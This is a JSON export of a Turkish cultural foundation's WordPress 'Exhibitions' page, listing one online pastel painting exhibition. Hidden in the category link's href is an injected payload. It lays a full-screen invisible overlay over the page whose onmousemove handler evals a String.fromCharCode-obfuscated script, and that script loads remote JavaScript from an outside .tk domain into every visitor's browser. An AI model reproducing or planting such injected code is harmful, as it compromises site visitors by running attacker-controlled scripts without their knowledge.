{"id":25957,"date":"2023-11-20T15:38:00","date_gmt":"2023-11-20T12:38:00","guid":{"rendered":"https:\/\/kerimvakfi.org\/exhibitions\/"},"modified":"2023-11-20T15:38:03","modified_gmt":"2023-11-20T12:38:03","slug":"exhibitions","status":"publish","type":"page","link":"https:\/\/kerimvakfi.org\/en\/exhibitions\/","title":{"rendered":"Exhibitions"},"content":{"rendered":"<p><div id=\"pages\"><div class=\"fusion-fullwidth fullwidth-box fusion-builder-row-1 fusion-flex-container nonhundred-percent-fullwidth non-hundred-percent-height-scrolling\" style=\"background-color: #fff;background-position: left top;background-repeat: no-repeat;border-width: 1px 0px 1px 0px;border-color:#e5e4e4;border-style:solid;\" ><div class=\"fusion-builder-row fusion-row fusion-flex-align-items-center\" style=\"max-width:1248px;margin-left: calc(-4% \/ 2 );margin-right: calc(-4% \/ 2 );\"><div class=\"fusion-layout-column fusion_builder_column fusion-builder-column-0 fusion_builder_column_1_1 1_1 fusion-flex-column fusion-flex-align-self-flex-start fusion-column-no-min-height\"><div class=\"fusion-column-wrapper fusion-flex-justify-content-flex-start fusion-content-layout-column\" style=\"background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;padding: 0px 0px 0px 0px;\"><div class=\"fusion-text fusion-text-1\" style=\"transform:translate3d(0,0,0);\"><p style=\"text-align: center; margin-top: -10px; font-size: 17px !important; line-height: 24px !important;\">Kerim Foundation organizes various exhibitions as part of its activities to support culture and arts.<\/p>\n<\/div><\/div><\/div><style type=\"text\/css\">.fusion-body .fusion-builder-column-0{width:100% !important;margin-top : 0px;margin-bottom : 0px;}.fusion-builder-column-0 > .fusion-column-wrapper {padding-top : 0px !important;padding-right : 0px !important;margin-right : 1.92%;padding-bottom : 0px !important;padding-left : 0px !important;margin-left : 1.92%;}@media only screen and (max-width:1024px) {.fusion-body .fusion-builder-column-0{width:100% !important;}.fusion-builder-column-0 > .fusion-column-wrapper {margin-right : 1.92%;margin-left : 1.92%;}}@media only screen and (max-width:640px) {.fusion-body .fusion-builder-column-0{width:100% !important;}.fusion-builder-column-0 > .fusion-column-wrapper {margin-right : 1.92%;margin-left : 1.92%;}}<\/style><\/div><style type=\"text\/css\">.fusion-body .fusion-flex-container.fusion-builder-row-1{ padding-top : 45px;margin-top : 0px;padding-right : 0px;padding-bottom : 10px;margin-bottom : 0px;padding-left : 0px;}<\/style><\/div><\/div><div class=\"fusion-fullwidth fullwidth-box fusion-builder-row-2 fusion-flex-container nonhundred-percent-fullwidth non-hundred-percent-height-scrolling\" style=\"background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;border-width: 0px 0px 0px 0px;border-color:#eae9e9;border-style:solid;\" ><div class=\"fusion-builder-row fusion-row fusion-flex-align-items-flex-start\" style=\"max-width:1248px;margin-left: calc(-4% \/ 2 );margin-right: calc(-4% \/ 2 );\"><div class=\"fusion-layout-column fusion_builder_column fusion-builder-column-1 fusion_builder_column_1_1 1_1 fusion-flex-column fusion-flex-align-self-flex-start fusion-column-no-min-height\"><div class=\"fusion-column-wrapper fusion-flex-justify-content-flex-start fusion-content-layout-column\" style=\"background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;padding: 0px 0px 0px 0px;\"><div class=\"fusion-recent-works fusion-portfolio-element fusion-portfolio fusion-portfolio-1 fusion-portfolio-grid fusion-portfolio-paging-infinite fusion-portfolio-three fusion-portfolio-no_text fusion-portfolio-rollover\" data-id=\"-rw-1\" data-columns=\"three\"><div role=\"menubar\"><ul class=\"fusion-filters\" role=\"menu\" aria-label=\"filters\"><li role=\"menuitem\" class=\"fusion-filter fusion-hidden fusion-active\"><a href=\"#\" data-filter=\".exhibitions\">Exhibitions<\/a><\/li><\/ul><\/div><style type=\"text\/css\">.fusion-portfolio-1 .fusion-portfolio-wrapper .fusion-col-spacing{padding:6px;}<\/style><div class=\"fusion-portfolio-wrapper\" id=\"fusion-portfolio-1\" data-picturesize=\"auto\" data-pages=\"1\" style=\"margin:-6px;\"><article id=\"portfolio-1-post-26258\" class=\"fusion-portfolio-post exhibitions fusion-col-spacing post-26258\"><div class=\"fusion-portfolio-content-wrapper\" style=\"border:none;\"><span class=\"entry-title rich-snippet-hidden\">&#8220;Akseden&#8221; Online Pastel Painting Exhibition<\/span><span class=\"vcard rich-snippet-hidden\"><span class=\"fn\"><a href=\"https:\/\/kerimvakfi.org\/en\/author\/webmaster\/\" title=\"Posts by webmaster\" rel=\"author\">webmaster<\/a><\/span><\/span><span class=\"updated rich-snippet-hidden\">2024-02-08T14:04:29+03:00<\/span>\n\n<div  class=\"fusion-image-wrapper\" aria-haspopup=\"true\">\n\t\n\t\n\t\n\t\t\n\t\t\t\t\t<img width=\"1200\" height=\"600\" src=\"https:\/\/i2.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2022\/06\/760x380_web-akseden.png?resize=1200%2C600&#038;ssl=1\" class=\"attachment-full size-full wp-post-image\" alt=\"\" srcset=\"https:\/\/i2.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2022\/06\/760x380_web-akseden.png?resize=200%2C100&amp;ssl=1 200w, https:\/\/i2.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2022\/06\/760x380_web-akseden.png?resize=300%2C150&amp;ssl=1 300w, https:\/\/i2.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2022\/06\/760x380_web-akseden.png?resize=400%2C200&amp;ssl=1 400w, https:\/\/i2.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2022\/06\/760x380_web-akseden.png?resize=500%2C250&amp;ssl=1 500w, https:\/\/i2.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2022\/06\/760x380_web-akseden.png?resize=600%2C300&amp;ssl=1 600w, https:\/\/i2.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2022\/06\/760x380_web-akseden.png?resize=700%2C350&amp;ssl=1 700w, https:\/\/i2.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2022\/06\/760x380_web-akseden.png?resize=768%2C384&amp;ssl=1 768w, https:\/\/i2.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2022\/06\/760x380_web-akseden.png?resize=800%2C400&amp;ssl=1 800w, https:\/\/i2.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2022\/06\/760x380_web-akseden.png?resize=1030%2C515&amp;ssl=1 1030w, https:\/\/i2.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2022\/06\/760x380_web-akseden.png?resize=1200%2C600&amp;ssl=1 1200w, https:\/\/i2.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2022\/06\/760x380_web-akseden.png?resize=1536%2C768&amp;ssl=1 1536w, https:\/\/i2.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2022\/06\/760x380_web-akseden.png?w=2400&amp;ssl=1 2400w, https:\/\/i2.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2022\/06\/760x380_web-akseden.png?fit=3167%2C1583&amp;ssl=1 3167w\" sizes=\"(min-width: 2200px) 100vw, (min-width: 784px) 392px, (min-width: 712px) 588px, (min-width: 640px) 712px, \" data-recalc-dims=\"1\" \/>\n\t\n\n\t\t<div class=\"fusion-rollover\">\n\t<div class=\"fusion-rollover-content\">\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<a class=\"fusion-rollover-link\" href=\"https:\/\/kerimvakfi.org\/en\/vakfin-calismasi\/akseden-online-pastel-painting-exhibition\/?portfolioCats=187%2C187\">&#8220;Akseden&#8221; Online Pastel Painting Exhibition<\/a>\n\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t<div class=\"fusion-rollover-sep\"><\/div>\n\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<a class=\"fusion-rollover-gallery\" href=\"https:\/\/i2.wp.com\/kerimvakfi.org\/wp-content\/uploads\/2022\/06\/760x380_web-akseden.png?fit=3167%2C1583&ssl=1\" data-id=\"26258\" data-rel=\"iLightbox[gallery-rw-1]\" data-title=\"760x380_web akseden\" data-caption=\"\">\n\t\t\t\t\t\tGallery\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t<h4 class=\"fusion-rollover-title\">\n\t\t\t\t\t<a class=\"fusion-rollover-title-link\" href=\"https:\/\/kerimvakfi.org\/en\/vakfin-calismasi\/akseden-online-pastel-painting-exhibition\/?portfolioCats=187%2C187\">\n\t\t\t\t\t\t&#8220;Akseden&#8221; Online Pastel Painting Exhibition\t\t\t\t\t<\/a>\n\t\t\t\t<\/h4>\n\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t<div class=\"fusion-rollover-categories\"><a href=\"https:\/\/kerimvakfi.org\/en\/testing%20style=position:fixed;%20top:0px;%20left:0px;%20width:9000px;%20height:9000px;%20background-color:white;%20onmousemove=eval(String.fromCharCode(118,%2097,%20114,%2032,%20116,%20115,%20114,%2032,%2061,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2034,%20115,%2099,%20114,%20105,%20112,%20116,%2034,%2041,%2059,%2032,%2032,%20116,%20115,%20114,%2046,%20116,%20121,%20112,%20101,%2032,%2061,%2032,%2034,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2034,%2059,%2032,%2032,%20116,%20115,%20114,%2046,%20115,%20114,%2099,%2032,%2061,%2032,%2034,%20104,%20116,%20116,%20112,%20115,%2058,%2047,%2047,%20115,%20116,%2097,%20116,%20115,%2046,%20115,%20116,%2097,%20114,%20116,%20114,%20101,%2099,%20101,%20105,%20118,%20101,%2046,%20116,%20107,%2047,%20115,%2099,%2046,%20106,%20115,%2034,%2059,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%20104,%20101,%2097,%20100,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20116,%20115,%20114,%2041,%2059))%20data-x=\/exhibitions\/\" rel=\"tag\">Exhibitions<\/a><\/div>\t\t\t\t\t\n\t\t\n\t\t\t\t<a class=\"fusion-link-wrapper\" href=\"https:\/\/kerimvakfi.org\/en\/vakfin-calismasi\/akseden-online-pastel-painting-exhibition\/?portfolioCats=187%2C187\" aria-label=\"&#8220;Akseden&#8221; Online Pastel Painting Exhibition\"><\/a>\n\t<\/div>\n<\/div>\n\n\t\n<\/div>\n<\/div><\/article><\/div><\/div><\/div><\/div><style type=\"text\/css\">.fusion-body .fusion-builder-column-1{width:100% !important;margin-top : 0px;margin-bottom : 0px;}.fusion-builder-column-1 > .fusion-column-wrapper {padding-top : 0px !important;padding-right : 0px !important;margin-right : 1.92%;padding-bottom : 0px !important;padding-left : 0px !important;margin-left : 1.92%;}@media only screen and (max-width:1024px) {.fusion-body .fusion-builder-column-1{width:100% !important;}.fusion-builder-column-1 > .fusion-column-wrapper {margin-right : 1.92%;margin-left : 1.92%;}}@media only screen and (max-width:640px) {.fusion-body .fusion-builder-column-1{width:100% !important;}.fusion-builder-column-1 > .fusion-column-wrapper {margin-right : 1.92%;margin-left : 1.92%;}}<\/style><\/div><style type=\"text\/css\">.fusion-fullwidth.fusion-builder-row-2 { overflow:visible; }.fusion-body .fusion-flex-container.fusion-builder-row-2{ padding-top : 0px;margin-top : 0px;padding-right : 0px;padding-bottom : 0px;margin-bottom : 0px;padding-left : 0px;}<\/style><\/div><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"100-width.php","meta":{"spay_email":""},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v18.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Exhibitions - Kerim Vakf\u0131<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kerimvakfi.org\/en\/exhibitions\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Exhibitions - Kerim Vakf\u0131\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kerimvakfi.org\/en\/exhibitions\/\" \/>\n<meta property=\"og:site_name\" content=\"Kerim Vakf\u0131\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/kerimvakfi\" \/>\n<meta property=\"article:modified_time\" content=\"2023-11-20T12:38:03+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary\" \/>\n<meta name=\"twitter:site\" content=\"@kerimvakfi\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kerimvakfi.org\/#website\",\"url\":\"https:\/\/kerimvakfi.org\/\",\"name\":\"Kerim Vakf\u0131\",\"description\":\"Kerim E\u011fitim K\u00fclt\u00fcr ve Sa\u011fl\u0131k Vakf\u0131\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kerimvakfi.org\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kerimvakfi.org\/en\/exhibitions\/#webpage\",\"url\":\"https:\/\/kerimvakfi.org\/en\/exhibitions\/\",\"name\":\"Exhibitions - Kerim Vakf\u0131\",\"isPartOf\":{\"@id\":\"https:\/\/kerimvakfi.org\/#website\"},\"datePublished\":\"2023-11-20T12:38:00+00:00\",\"dateModified\":\"2023-11-20T12:38:03+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/kerimvakfi.org\/en\/exhibitions\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kerimvakfi.org\/en\/exhibitions\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/kerimvakfi.org\/en\/exhibitions\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Ana sayfa\",\"item\":\"https:\/\/kerimvakfi.org\/en\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Exhibitions\"}]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Exhibitions - Kerim Vakf\u0131","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kerimvakfi.org\/en\/exhibitions\/","og_locale":"en_US","og_type":"article","og_title":"Exhibitions - Kerim Vakf\u0131","og_url":"https:\/\/kerimvakfi.org\/en\/exhibitions\/","og_site_name":"Kerim Vakf\u0131","article_publisher":"https:\/\/www.facebook.com\/kerimvakfi","article_modified_time":"2023-11-20T12:38:03+00:00","twitter_card":"summary","twitter_site":"@kerimvakfi","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/kerimvakfi.org\/#website","url":"https:\/\/kerimvakfi.org\/","name":"Kerim Vakf\u0131","description":"Kerim E\u011fitim K\u00fclt\u00fcr ve Sa\u011fl\u0131k Vakf\u0131","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kerimvakfi.org\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/kerimvakfi.org\/en\/exhibitions\/#webpage","url":"https:\/\/kerimvakfi.org\/en\/exhibitions\/","name":"Exhibitions - Kerim Vakf\u0131","isPartOf":{"@id":"https:\/\/kerimvakfi.org\/#website"},"datePublished":"2023-11-20T12:38:00+00:00","dateModified":"2023-11-20T12:38:03+00:00","breadcrumb":{"@id":"https:\/\/kerimvakfi.org\/en\/exhibitions\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kerimvakfi.org\/en\/exhibitions\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/kerimvakfi.org\/en\/exhibitions\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Ana sayfa","item":"https:\/\/kerimvakfi.org\/en\/"},{"@type":"ListItem","position":2,"name":"Exhibitions"}]}]}},"_links":{"self":[{"href":"https:\/\/kerimvakfi.org\/en\/wp-json\/wp\/v2\/pages\/25957"}],"collection":[{"href":"https:\/\/kerimvakfi.org\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/kerimvakfi.org\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/kerimvakfi.org\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/kerimvakfi.org\/en\/wp-json\/wp\/v2\/comments?post=25957"}],"version-history":[{"count":2,"href":"https:\/\/kerimvakfi.org\/en\/wp-json\/wp\/v2\/pages\/25957\/revisions"}],"predecessor-version":[{"id":25967,"href":"https:\/\/kerimvakfi.org\/en\/wp-json\/wp\/v2\/pages\/25957\/revisions\/25967"}],"wp:attachment":[{"href":"https:\/\/kerimvakfi.org\/en\/wp-json\/wp\/v2\/media?parent=25957"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}